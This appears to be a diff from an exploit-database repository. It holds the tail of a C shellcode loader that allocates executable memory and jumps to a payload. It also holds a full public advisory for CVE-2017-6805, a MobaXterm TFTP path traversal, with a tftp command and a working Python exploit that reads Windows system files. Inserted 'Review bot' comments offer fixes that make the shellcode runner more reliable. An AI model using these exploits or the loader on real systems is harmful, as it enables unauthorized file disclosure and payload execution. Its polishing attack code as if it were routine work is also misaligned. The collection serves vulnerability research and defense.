ExecuteShellcode();
|
||||
getchar();
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
void ExecuteShellcode(){
|
||||
char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(BUFFER, Shellcode, sizeof(Shellcode));
|
||||
(*(void(*)())BUFFER)();
|
||||
}
|
||||
|
||||
|
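Review bot: `ExecuteShellcode` never checks the `VirtualAlloc` result, so when the allocation fails the following `memcpy` writes through a NULL pointer and the test harness dies with an unrelated access violation instead of a diagnosable error. Add `if (BUFFER == NULL) { fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError()); return; }` between the allocation and the `memcpy`, and since the assembly header documents that the payload returns to its caller (`ret ; Return`), release the page with `VirtualFree(BUFFER, 0, MEM_RELEASE);` after the indirect call. As a style point, the comment `hash(User32.dll, ShowWindow)` is the only one of the three hash comments without quoted arguments; `hash("user32.dll", "ShowWindow")` matches the two lines above it.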
125
platforms/windows/remote/41592.txt
Executable file
|
@ -0,0 +1,125 @@
|
|||
[+] Credits: John Page AKA hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=====================
|
||||
mobaxterm.mobatek.net
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===============================
|
||||
MobaXterm Personal Edition v9.4
|
||||
|
||||
Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=====================================
|
||||
Path Traversal Remote File Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-6805
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using
|
||||
directory traversal attacks e.g. ../../../../Windows/system.ini
|
||||
|
||||
Start MobaXterm TFTP server which listens on default TFTP port 69.
|
||||
|
||||
c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
|
||||
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
|
||||
|
||||
c:\xampp\htdocs>type system.ini
|
||||
; for 16-bit app support
|
||||
[386Enh]
|
||||
woafont=dosapp.fon
|
||||
EGA80WOA.FON=EGA80WOA.FON
|
||||
EGA40WOA.FON=EGA40WOA.FON
|
||||
CGA80WOA.FON=CGA80WOA.FON
|
||||
CGA40WOA.FON=CGA40WOA.FON
|
||||
|
||||
[drivers]
|
||||
wave=mmdrv.dll
|
||||
timer=timer.drv
|
||||
|
||||
[mci]
|
||||
|
||||
Victim Data located on: 127.0.0.1
|
||||
|
||||
|
||||
|
||||
POC URL:
|
||||
=============================
|
||||
https://vimeo.com/207516364
|
||||
|
||||
|
||||
|
||||
|
||||
Exploit:
|
||||
==========
|
||||
|
||||
import sys,socket
|
||||
|
||||
print 'MobaXterm TFTP Directory Traversal 0day Exploit'
|
||||
print 'Read Windows/system.ini'
|
||||
print 'hyp3rlinx \n'
|
||||
|
||||
HOST = raw_input("[IP]>")
|
||||
FILE = 'Windows/system.ini'
|
||||
PORT = 69
|
||||
|
||||
PAYLOAD = "\x00\x01" #TFTP Read
|
||||
PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal
|
||||
PAYLOAD += "netascii\x00" #TFTP Type
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.sendto(PAYLOAD, (HOST, PORT))
|
||||
out = s.recv(1024)
|
||||
s.close()
|
||||
|
||||
print "Victim Data located on : %s " %(HOST)
|
||||
print out.strip()
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
High
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: No Reply
|
||||
March 10, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
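Review bot: The advisory gives a CVE reference and a PoC but no mitigation or fixed-version line, so a reader is left with nothing actionable beyond `Vendor Notification: No Reply`. Suggest a short `Mitigation:` section after the Disclosure Timeline: leave the MobaXterm TFTP server stopped unless it is needed (the write-up itself shows it being started manually), point its root at a dedicated directory, and block inbound UDP/69 at the host firewall; the server-side fix is to canonicalize the requested filename and refuse any path that resolves outside the configured root. The PoC uses Python 2 syntax (`print 'x'`, `raw_input`) and nothing in the Exploit section says so; a one-line `# Python 2` note above `import sys,socket` would save readers a failed run.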